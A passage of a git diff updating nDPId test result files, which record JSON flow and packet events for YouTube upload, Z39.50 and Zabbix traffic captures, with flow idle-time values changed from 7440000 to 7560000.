RdrxYmmjeJbc+3jgs5l6RJLipl3aPIQhj9TtUVgIgA9hjkGDtPgI+WyeFtwtRP0uw9dCVeIWw5SDGQbdmUYsAdwDd6x0reg1PpiCLga2BaHB+Lo6dAdVciI09EcTNtuy+zAAAAV94FiCrAAAEAwBIMEYCIQCUIhZCh2zhmqj0uNpoeUCnAI4TO75j9mv1oMYRKX9EbwIhAIVqH7drJ4DDuKcAhaeeCXOoj8EoQkKnHGLbzkyKPDlhAQEDAeiBYJKSGugAAAAAALsLAAB4u4FGwB+tWGtQE1cUJpBXY6I8VdDyFNEgYZOQAr7wiYpWBawlaIsJ2cBCSCJJwEgVWK3A4KNOsVAVxfdjqlClUhXRURAFClYRHasEpKBgRdBILVjtzS6ETSYz9oczmdmc777Onnvu9527WTQrwFy0TRBKTcQLKrp9dm9xz+ylJ4l0NALQ0SJTNhpMGAZIGIUiTgYb8pXrDXnhuTHeCAI35bB6mBzcF\/AwMggEG8\/l8gN4AQK8oOLyArh8PlZQSS0uRWcy5oK8kSqS5YhoKCFpTNbnCo1cbciulQicavSLSfTLCXLA\/GIy2SCmBhjbXCGAaeAd62cA1adjf2xINJs5VuSOLXMcnO6g0xtjxu1zfIrK71z\/\/lBHSmjev8J8r4IzjW36x8zZNOc0+uStj3j5jQFTCvdXObyJDvLf4usWsNFD234IpYyDUMoYbF1AYEyIMUxgprRFy4BQm1YDYkdGbe4DoxE1cRNlsTkiuSRZgUgwczQwlUpYHofIYWI3ezYnVqbQSIiYI5sjEQfx+cECvhGWo1QwPWhGR4JnLMjJFDVvaGa8k59ILpJp1UisCsNHD
LsjIhoybIah1TiI3NROUJramkR0FPHFOKJkc0BjBojNewCvTYGkdWaA2nxIipzgswQmGLCKYEiTCUa8hmAgaoIhlxEMpYmhNmwBbogkgDbw4BmdwRG5YU9wALQmwaAKwbrZDaEpiARWYJAhC1RqQKaxhmEsggUaGWzDvnEJ\/3lDO54Eq5NBL2JvMBWod+IRjNRQW4MlI+YJ2HmtQqPWiGE\/uSJWoUhEjKk3iJt1gyUaXPYxnAZwNUeMxRakTVIchroY"} 02274{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1511102578109,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102578109,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADgRtn+s2RdvwKgCGwG78xgFTrFpCAjRAddSQpCnArwHRDvEv6bzYWaHzaQBBSEEhrNWhsBytYq44AhiRo+TwCmwTKGEk42JPpys442NKgutZCyRqQAAtRXqaDF9GcRDYiH0Y\/Fi0MLsDELQGJhY4OvQsShgL0wMj6PF4FCw0EDxBIlYDUjOl0D+boN8rExECEHyX7Bo9gIexu6+BD0Z6jwYVS5xhEFjCAVnb9OEZ+1zI6xu60jhXe7FYiEjXGJWdBF1I+wRdfS48r74X1JeZ567KHa5EJ3pD3ngVQyQUTCSgZUFTVprCgmiU6lxmUwgGRCEl12TIR\/Iu8iryOND7yMz0xaswN6jCztbGOmK9M1HAtnb0p6qNH6hov6O7rqWzJfC2lmeHtZeU6WbjsS8u3ntcJQzOr2oWOwTXcLWes24V6eOPFWo8+TNul2fEFLQ78eM1PXs2XQnqjfDqk3auk2v6+r9pEcxm7ylpmzrihbHoOb9i7fucvoKaS0tCfOsbMqMP3nB9ezFL69FLLtTF+p+dsZl1fPc\/DBpqVvY0e9eHrAZ+VA9+k3JGb\/9upojFbdLGEEHzpW4tGy79WmG8IZ+5InTV7teNKN9mWsYUcLOpqcV59uW1kr1OramoTHz1vv11JzRr2tDd4S\/WkfbF2P7ZGza6rI\/j9Us8WXle5QG\/b6jzfNgyphjqo6oKWSDFJMnAQGwxaXYlmTl4Z1d0i88lvqCkib10ZlL8sf48IBpMSTg8YAY8\/iBmBZzeXzwEwQLgqM\/pux\/6Oa0l01OXX1\/+c6p1ENoy\/3lC8tzQnqdlS7ZoRtbdlT15tR7dEe\/E7HKePNyitQjIpd9cbgeFe\/qfiaMud5KybCv\/DovpHzVwiB95N8TOgZ2djpVNugjWfqwt\/tXNG+oKEpUZF25tdxtEmQz6wFdFS5Lfz91+rFA6vZLi+3IzzZMaO745y137UDe3TWvOGHFc27XdlUmuJypi3zktDjX7YazyO23wuMzY303CxB48w3nqlDPN5G7Ktoywmyvs\/+6kO9uVx38oy25qEe0fpf31qURmsfnntNrHN\/WeyacXdoQapOfb7Pxys\/NacXz+Q0XZq4ta9Z7e19lCXIKCwdG2mlzXAOrircnI\/g3DpRkByLCMjmYFj9jDB9zi+fW\/KMGh8A\/npA75EqgFPvB8xrHUWmTYjFShuyNNEGHqOBhDa5jAvygcyBwwyoCN6wtE0wGiocL7zg1ftXFTvv\/oJAPXPQs8EXNovaf7kkkqasq1vY36F29qncjsStini1pcp7kJZF
uH1+dlSGJIedOLC7QMZTl5c4zutP4J9Iv6SmNyouUidqu3dUF52nOcEDd9M6QKlK\/grnxj\/XK1Uve+Vn11FT4bS89njFAcsiu3RvSfjG1ZmrcZ6\/q7\/pYJ88tuiS37l1AWTuTJOy02+fyavOojKMH1wn8z1UfTB\/zTWvuytPdcdnhPtCaI+KIa4F3p3V9yyYFZR1sUJ46vP5m5ZOaqgflXryX78ZeTWvRTfNvvGXb8cOSgXllHhLWeas8yH5iVlRBMCVoVB26EFSw0u7LpTGV75XHW9Nztb6\/wrxD58u4nYzXfW68h\/8B+TYP2QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1511102576835,"flow_last_seen":1511102576954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4704,"flow_avg_l4_payload_len":361,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1511102576835,"flow_last_seen":1511102576954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4704,"flow_avg_l4_payload_len":361,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"}} 
00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1511102576794,"flow_last_seen":1511102580286,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":102276,"flow_avg_l4_payload_len":1022,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1511102578051,"flow_last_seen":1511102594936,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":14106,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","packets-captured":137,"packets-processed":137,"total-skipped-flows":0,"total-l4-data-len":121086,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1511102594936} 
diff --git a/test/results/z3950.pcapng.out b/test/results/z3950.pcapng.out index 57720f541..6385be3a0 100644 --- a/test/results/z3950.pcapng.out +++ b/test/results/z3950.pcapng.out 
@@ -1,18 +1,18 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"z3950.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"z3950.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1623680697296} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623680697296,"flow_last_seen":1623680697296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623680697296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623680697296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623680697296,"pkt":"eJS0JASgYDjgxTWgCABFAAA07vtAAH8Gl6\/AqAJkwa7wXeYpANJ85vsBAAAAAIAC+vCgIgAAAgQFtAEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623680697327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623680697327,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAADYGz6vBrvBdwKgCZADS5indlQhqfOb7AoAS+vC6GgAAAgQFrAEBBAIBAwMH"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623680697329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1623680697329,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7vxAAH8Gl7rAqAJkwa7wXeYpANJ85vsC3ZUIa1AQAgTz0QAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623680697296,"flow_last_seen":1623680697296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623680697296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623680697296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623680697296,"pkt":"eJS0JASgYDjgxTWgCABFAAA07vtAAH8Gl6\/AqAJkwa7wXeYpANJ85vsBAAAAAIAC+vCgIgAAAgQFtAEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623680697327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623680697327,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAADYGz6vBrvBdwKgCZADS5indlQhqfOb7AoAS+vC6GgAAAgQFrAEBBAIBAwMH"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623680697329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1623680697329,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7vxAAH8Gl7rAqAJkwa7wXeYpANJ85vsC3ZUIa1AQAgTz0QAA"} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-data-len":4151,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1625070123680} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625070123680,"flow_last_seen":1625070123680,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1625070123680,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1625070123680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1625070123680,"pkt":"YDjgxTWgABjzZLGICABFAAA0k\/xAAJAGiSTAqAAUgbuLK7W8JweM39PGAAAAAIAC+vDNyQAAAgQFtAEBBAIBAwMH"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1625070123709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1625070123709,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0AABAADUGeCGBu4srwKgAFCcHtbz4JgxZjN\/Tx4ASchDtagAAAgQFrAEBBAIBAwMH"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1625070123709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1625070123709,"pkt":"YDjgxTWgABjzZLGICABFAAAok\/1AAJAGiS\/AqAAUgbuLK7W8JweM39PH+CYMWlAQAfbNvQAA"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1625070132777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1625070132777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1625070123680,"flow_last_seen":1625070196998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1625070196998,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}} -00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1625070123680,"flow_last_seen":1625070200217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":411,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1625070200217,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625070123680,"flow_last_seen":1625070123680,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1625070123680,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1625070123680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1625070123680,"pkt":"YDjgxTWgABjzZLGICABFAAA0k\/xAAJAGiSTAqAAUgbuLK7W8JweM39PGAAAAAIAC+vDNyQAAAgQFtAEBBAIBAwMH"} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1625070123709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1625070123709,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0AABAADUGeCGBu4srwKgAFCcHtbz4JgxZjN\/Tx4ASchDtagAAAgQFrAEBBAIBAwMH"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1625070123709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1625070123709,"pkt":"YDjgxTWgABjzZLGICABFAAAok\/1AAJAGiS\/AqAAUgbuLK7W8JweM39PH+CYMWlAQAfbNvQAA"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1625070132777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}} 
+00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1625070132777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1625070123680,"flow_last_seen":1625070196998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1625070196998,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}} +00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1625070123680,"flow_last_seen":1625070200217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":411,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1625070200217,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": 
{"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","packets-captured":31,"packets-processed":31,"total-skipped-flows":0,"total-l4-data-len":4562,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1625070200217} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 31/31 diff --git a/test/results/zabbix.pcap.out b/test/results/zabbix.pcap.out index 3ba208ceb..4ec962d29 100644 --- a/test/results/zabbix.pcap.out +++ b/test/results/zabbix.pcap.out 
@@ -1,11 +1,11 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"zabbix.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"zabbix.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1572254070608} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
